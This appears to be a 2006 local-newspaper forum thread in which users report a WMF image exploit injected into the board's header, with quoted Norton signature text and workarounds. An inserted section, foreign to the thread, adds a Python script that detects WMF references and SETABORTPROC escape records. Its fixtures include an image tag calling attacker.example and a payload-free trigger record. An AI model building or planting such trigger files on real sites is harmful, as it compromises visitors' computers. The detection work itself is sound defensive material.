BMIC
Jun 3 2006, 09:38 AM
As soon as I entered the forums, my antivirus warned me of an unauthorized attempt to hack into my computer and a file started downloading, which I quickly cancelled.
So either some spammer put a virus in one of their posts, or the Herald-Mail has added some new feature that attempts to make illicit connections to control our computers and download files without asking for permission first.
If it's the former, then H-M needs to upgrade their antivirus protection on the boards to keep people from posting viruses. If it's the latter, they REALLY need to cut it out!
----
More details. The attack was flagged by Norton as a ...
HTTP MS Windows WMF Code Exec
Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
Description: This signature detects an attempt to exploit a vulnerability in the Microsoft Windows Metafile (WMF) image format.
Additional Information
Microsoft Windows supports the Windows Metafile (WMF) image format. WMF is a 16-bit image format and contains vector and bitmap information.
The Microsoft Windows WMF graphics rendering engine is affected by a remote code execution vulnerability. The cause of this issue is currently unknown.
The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file.
Any code execution that occurs will be with the privileges of the user viewing a malicious image. An attacker may gain SYSTEM privileges if an administrator views the malicious file.
This issue could be exploited remotely through any means that would allow an attacker to transmit the malicious image to a user, including through a malicious Web site and HTML email, or embedding it in an Office document. Attacks could also occur by enticing the victim to visit a remote file share hosting the file. User interaction is required in remote attack scenarios.
A local attacker could also exploit this issue to gain elevated privileges without any user interaction. It is noted that any application that is used to view the affected image type may present an attack vector.
It should be noted that viewing a malicious file in Windows Explorer may automatically trigger this issue.
Due to a lack of details, further information is not available at the moment. This BID will be updated when more information becomes available.
Affected:
...
Response
Workaround:
This vulnerability can be exploited when the Microsoft Windows Picture and Fax Viewer application opens a malicious file. It has been reported that the Microsoft Windows Picture and Fax Viewer application may be disabled by deregistering 'shimgvw.dll' by carrying out the following steps:
Start > Run > regsvr32 /u shimgvw.dll
The following registry entry may also be used to disable the application:
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\ShellEx\ContextMenuHandlers\ShellImagePreview]
@=""
It should be noted that the workaround described above has not been verified or tested by Symantec.
Solution:
Currently there are no known patches or workarounds for this vulnerability. It is recommended that users upgrade to the latest version of the application and contact the vendor for more details.
Possible False Positives
There are no known false positives associated with this signature.
BMIC
Jun 3 2006, 10:15 AM
Whatever it is, it eventually managed to get past my antivirus and downloaded a virus, Hacktool.IE.Exploit, to my PC. Norton Antivirus found and deleted it, but this is BAD, people!
Wrangler3
Jun 3 2006, 11:17 AM
QUOTE (BMIC @ Jun 3 2006, 11:15 AM)

Whatever it is, it eventually managed to get past my antivirus and downloaded a virus, Hacktool.IE.Exploit, to my PC. Norton Antivirus found and deleted it, but this is BAD, people!
Try using Firefox and disable Java. It asked me before opening the file what I wanted to use, and I refused the file. IE will open the file automatically, as I found out.
BMIC
Jun 4 2006, 11:31 AM
QUOTE (Wrangler3 @ Jun 3 2006, 12:17 PM)

Try using Firefox and disable Java. It asked me before opening the file what I wanted to use, and I refused the file. IE will open the file automatically, as I found out.
That seems to have done the trick. Thanks!
P.S. - I hope they're able to track down the source of this - and prosecute the bejeebers outta the scumbag!
Yossarian
Jun 4 2006, 05:19 PM
It's probably payback for the dozen or so asshat spammers I've banned.
Wrangler3
Jun 4 2006, 07:59 PM
QUOTE (Yossarian @ Jun 4 2006, 06:19 PM)

It's probably payback for the dozen or so asshat spammers I've banned.
No doubt.
WVDragonlady
Jun 5 2006, 01:00 PM
Is it safe yet? Can I allow scripts on here now?
Yossarian
Jun 5 2006, 01:24 PM
Nope, I'm still getting the virus warnings.
City Park Dad
Jun 5 2006, 01:25 PM
QUOTE (Yossarian @ Jun 5 2006, 02:24 PM)

Nope, I'm still getting the virus warnings.
When exactly are you getting these warnings? When you get to the forum home page? A particular message?
Yossarian
Jun 5 2006, 01:44 PM
When I first open the forums and also when I go to another topic. My Firefox is warning me and Avast anti-vir is warning me.
WVDragonlady
Jun 5 2006, 01:45 PM
I was getting them as soon as the main page loaded. Then after my virus blocker cleaned and deleted it I was fine until I was in the Mail Call to a certain thread posted by someone with the handle Lusis Backwoods Jr. Then I got the pop-up again and it was cleaned and deleted. That's when I went ahead and downloaded Firefox.
pasty(1)
Jun 5 2006, 01:51 PM
totally lame.
the xpl.wmf is classic wmf exploit. it appears to be appended to the header tpl file or the header php file. you can see it in FF at the top, appears as a black dot in the center of the header.
OR, it has messed up a 'shout box' if there was one here.
herald mail should remove this website until they fix it.
you catch this thing when you have either a: a properly mis-configured apache server, or b: incorrect permissions on directories/files allowing uploading of files (i.e. a photo gallery)
So, the question is, who didn't get a norton popup? You are the people who are in trouble, and you have the HM to thank ha ha.
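pasty's post above says the forum's header template had a reference to a WMF file (xpl.wmf) injected into it, and the Norton signature text earlier in the thread explains that the bug fires when Windows parses a malicious WMF image. The script below is an added example for site operators, not code from this thread or from the forum software: it scans a template for image or link tags that point at a .wmf resource, identifies WMF files by their header magic, and flags files that carry an Escape record requesting SETABORTPROC (the record the WMF rendering bug is reached through). The record layout, the Escape function code 0x0626 and the SETABORTPROC value 9 are taken from the MS-WMF file format specification, not from the thread; the template snippet, the hostname attacker.example and the sample metafile are constructed fixtures.

```python
"""Scan a forum template for injected WMF references and inspect WMF files.

Added example, not code from the thread or from the forum software. Record
layout (uint32 size in 16-bit words, uint16 function code, parameters) follows
the MS-WMF specification.
"""
import re
import struct

PLACEABLE_KEY = 0x9AC6CDD7   # magic of the optional 22-byte "placeable" WMF header
META_ESCAPE = 0x0626         # WMF Escape record function code
META_EOF = 0x0000            # end-of-file record
SETABORTPROC = 0x0009        # Escape sub-function that the WMF rendering bug is reached through

# Constructed sample of a header template with an injected 1x1 image tag.
SAMPLE_TEMPLATE = """<div id="header">
<img src="{$logo_url}" alt="forum">
<img src="http://attacker.example/xpl.wmf" width="1" height="1">
</div>"""

_WMF_REF = re.compile(r'(?:src|href)\s*=\s*["\']([^"\']+?\.wmf)["\'?#]', re.I)


def find_wmf_references(html: str) -> list:
    """Return every src/href value in the HTML that points at a .wmf resource."""
    return _WMF_REF.findall(html)


def strip_placeable_header(data: bytes) -> bytes:
    """Drop the optional placeable header so the standard METAHEADER is at offset 0."""
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        return data[22:]
    return data


def is_wmf(data: bytes) -> bool:
    """Magic check: METAHEADER type 1 or 2, header size 9 words, version 0x100 or 0x300."""
    body = strip_placeable_header(data)
    if len(body) < 18:
        return False
    mtype, hdr_size, version = struct.unpack_from("<HHH", body, 0)
    return mtype in (1, 2) and hdr_size == 9 and version in (0x0100, 0x0300)


def iter_records(body: bytes):
    """Yield (function_code, params) for each record after the 18-byte header."""
    off = 18
    while off + 6 <= len(body):
        size_words, func = struct.unpack_from("<IH", body, off)
        size = size_words * 2
        if size < 6 or off + size > len(body):
            break  # truncated or malformed record: stop instead of reading past the buffer
        yield func, body[off + 6:off + size]
        if func == META_EOF:
            break
        off += size


def find_abortproc_escape(data: bytes) -> bool:
    """True if the metafile contains an Escape record whose sub-function is SETABORTPROC."""
    if not is_wmf(data):
        return False
    for func, params in iter_records(strip_placeable_header(data)):
        if func == META_ESCAPE and len(params) >= 2:
            if struct.unpack_from("<H", params, 0)[0] == SETABORTPROC:
                return True
    return False


def _record(func: int, params: bytes) -> bytes:
    """Encode one WMF record; params must have even length."""
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_sample_wmf(with_abortproc: bool) -> bytes:
    """Constructed fixture: a minimal disk metafile, optionally with a payload-free SETABORTPROC escape."""
    records = []
    if with_abortproc:
        records.append(_record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 4) + b"\x00" * 4))
    records.append(_record(META_EOF, b""))
    body = b"".join(records)
    max_record_words = max(len(r) for r in records) // 2
    header = struct.pack("<HHHIHIH", 2, 9, 0x0300, (18 + len(body)) // 2, 0, max_record_words, 0)
    return header + body


if __name__ == "__main__":
    print("WMF references in template:", find_wmf_references(SAMPLE_TEMPLATE))
    for flag in (False, True):
        sample = build_sample_wmf(flag)
        print("is_wmf:", is_wmf(sample), "abortproc escape:", find_abortproc_escape(sample))
```

Run it against the forum's template directory and any file referenced from the header; a template that references a .wmf at all is already suspicious on a board that never used that format, and a file that both passes `is_wmf` and trips `find_abortproc_escape` should be pulled and the web root checked for the upload path pasty describes.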
City Park Dad
Jun 5 2006, 03:11 PM
QUOTE (Yossarian @ Jun 5 2006, 02:44 PM)

When I first open the forums and also when i go to another topic. My firefox is warning me and Avast anti-vir is warning me.
I am not seeing any warnings. I am running FF on 2 machines and McAfee AV on one and Norton Corporate AV on the other.
WVDragonlady
Jun 5 2006, 03:17 PM
QUOTE (pasty(1) @ Jun 5 2006, 02:51 PM)

totally lame.
the xpl.wmf is classic wmf exploit. it appears to be appended to the header tpl file or the header php file. you can see it in FF at the top, appears as a black dot in the center of the header.
OR, it has messed up a 'shout box' if there was one here.
herald mail should remove this website until they fix it.
you catch this thing when you have either a: a properly mis-configured apache server, or b: incorrect permissions on directories/files allowing uploading of files (i.e. a photo gallery)
So, the question is, who didn't get a norton popup? You are the people who are in trouble, and you have the HM to thank ha ha.
so glad you're here to help.......ha ha.
phluux
Jun 5 2006, 03:26 PM
Norton has alerted me 3 times today. Luckily it cleaned everything.
City Park Dad
Jun 5 2006, 03:50 PM
Firefox must be blocking it for me. I still see no warnings.
webbie
Jun 8 2006, 12:24 PM
I think this is resolved. If anyone still has issues, please email me immediately, or have Yoss call me!
Thanks...I missed you all!
webbie
Udmas
Jun 8 2006, 12:31 PM
Thank You, Webbie
cfulmor
Jun 8 2006, 12:33 PM
Three Cheers for Webbie!!!
Hip-Hip-Hooray!
Hip-Hip-Hooray!
Hip-Hip-Hooray!
tagout
Jun 8 2006, 12:45 PM
my computer said i had a trojan, started downloading something , but its running ok now.
Heather
Jun 8 2006, 12:59 PM
QUOTE (pasty(1) @ Jun 5 2006, 02:51 PM)

totally lame.
the xpl.wmf is classic wmf exploit. it appears to be appended to the header tpl file or the header php file. you can see it in FF at the top, appears as a black dot in the center of the header.
OR, it has messed up a 'shout box' if there was one here.
herald mail should remove this website until they fix it.
you catch this thing when you have either a: a properly mis-configured apache server, or b: incorrect permissions on directories/files allowing uploading of files (i.e. a photo gallery)
So, the question is, who didn't get a norton popup? You are the people who are in trouble, and you have the HM to thank ha ha.
::adding pasty to my list of computer gods for future reference::
samy0
Jun 8 2006, 01:14 PM
Webbie,
Any chance you caught who did this? I had $20 on Rowdy until someone told me he still needs help getting to his email
WVDragonlady
Jun 8 2006, 01:17 PM
I think it was one of those spammers
samy0
Jun 8 2006, 01:21 PM
Starting a new pool. How long will the site stay up? I've got 4 days
WVDragonlady
Jun 8 2006, 01:24 PM
you so bad.

*head shaking smilie*
Heather
Jun 8 2006, 01:27 PM
I keep trying to shout in the search box.
And nobody but Phluux has an avatar so I actually have to read names of posters. So lazy...
WVDragonlady
Jun 8 2006, 01:31 PM
I've been using "The Back Page" as the shout box.
phluux
Jun 8 2006, 01:59 PM
Heather's avatar =
BMIC
Jun 8 2006, 03:51 PM
Thanks so much webbie! You have been busy - it must've been a doozy to take so long fixing it. Glad to see you did though! THANK YOU for the hard work!
tagout
Jun 8 2006, 04:31 PM
anyone know what went wrong? like i said , mine said i had 2 trojans, but now things work great.
BMIC
Jun 9 2006, 06:07 AM
Well my antivirus reported an intrusion attempt that takes advantage of a vulnerability that has to do with how Windows manages images. Then it showed some kind of script working that at least once led to my image viewer opening, but I couldn't see whatever picture had been forcibly downloaded. Then my antivirus detected a virus called "Hacktool" which I would assume from the name gives people the ability to hack into and take over your computer by opening a back door - an unauthorized port. As far as I can tell the hacker never quite got past all of the protections since my antivirus program immediately detected and deleted the Hacktool program, at which point I downloaded and installed Firefox and turned off scripts before returning, but it was a very close call.
So what I suspect happened, was that a hacker somehow posted an image - which must've been in the shoutbox since it started as soon as I connected to the main forum listing - containing code for a script that automatically downloaded a hacking program that would open a port allowing the hacker to connect to and take over any of our computers - without our awareness, if we didn't have proper antivirus protections in place. However, from the notices I read, I think the virus that was downloaded has been known for several years so the only people whom it should have worked against would be those who either don't have antivirus or haven't updated their virus definitions for years. So in the end it wasn't a very successful attack, unless there were other viruses downloaded that my totally updated antivirus somehow missed, which isn't likely because it's totally up-to-date. It does bother me that Norton Personal Firewall only blocked that script the first time and eventually let it download a virus, however. I had just updated that firewall program to the latest version a couple of weeks ago.
mstubble
Jun 10 2006, 08:18 AM
QUOTE
Virus or Malicious Code?
Thought I'd pass this along; we've been having all kinds of security training sessions at work

Viruses and worms are related classes of malicious code. Both share the primary objective of replication. However, they are distinctly different with respect to the techniques they use and their host system requirements. This distinction is due to the disjoint sets of host systems they attack. Viruses have been almost exclusively restricted to personal computers, while worms have attacked only multi-user systems.
- Trojan Horse - a program which performs a useful function, but also performs an unexpected action as well.
- Virus - a code segment which replicates by attaching copies to existing executables.
- Worm - a program which replicates itself and causes execution of the new copy.
- Network Worm - a worm which copies itself to another system by using common network facilities, and causes execution of the copy on that system.
tagout
Jun 10 2006, 09:08 AM
I think it had something to do with this forum. There was a lot of stuff going on, and then this forum went down for repairs. Mine came as a trojan; it was trying to download on my computer. What a mess.
BMIC
Jun 10 2006, 09:51 AM
QUOTE (Idiot @ Jun 10 2006, 10:34 AM)

The MSM had much good news to report during that time. Now that it's over no one is talking about Haditha.
Haditha was good news? ... oh yeah, I guess it was - to terrorist sympathizers!
The particular exploit used seems to have hit all sorts of forums using Invision Power Boards or vbulletin systems in recent months. It was allegedly fixed by a Microsoft Security update issued back in April 2006, but I get automatic security updates and my system wasn't perfectly protected, if at all.
Udmas
Jun 10 2006, 01:44 PM
QUOTE
I also heard that his last words while on the stretcher were: "Vote Democratic this November."
I bet he was wishing that we would've voted that way last election, then he might not have been laying on that stretcher.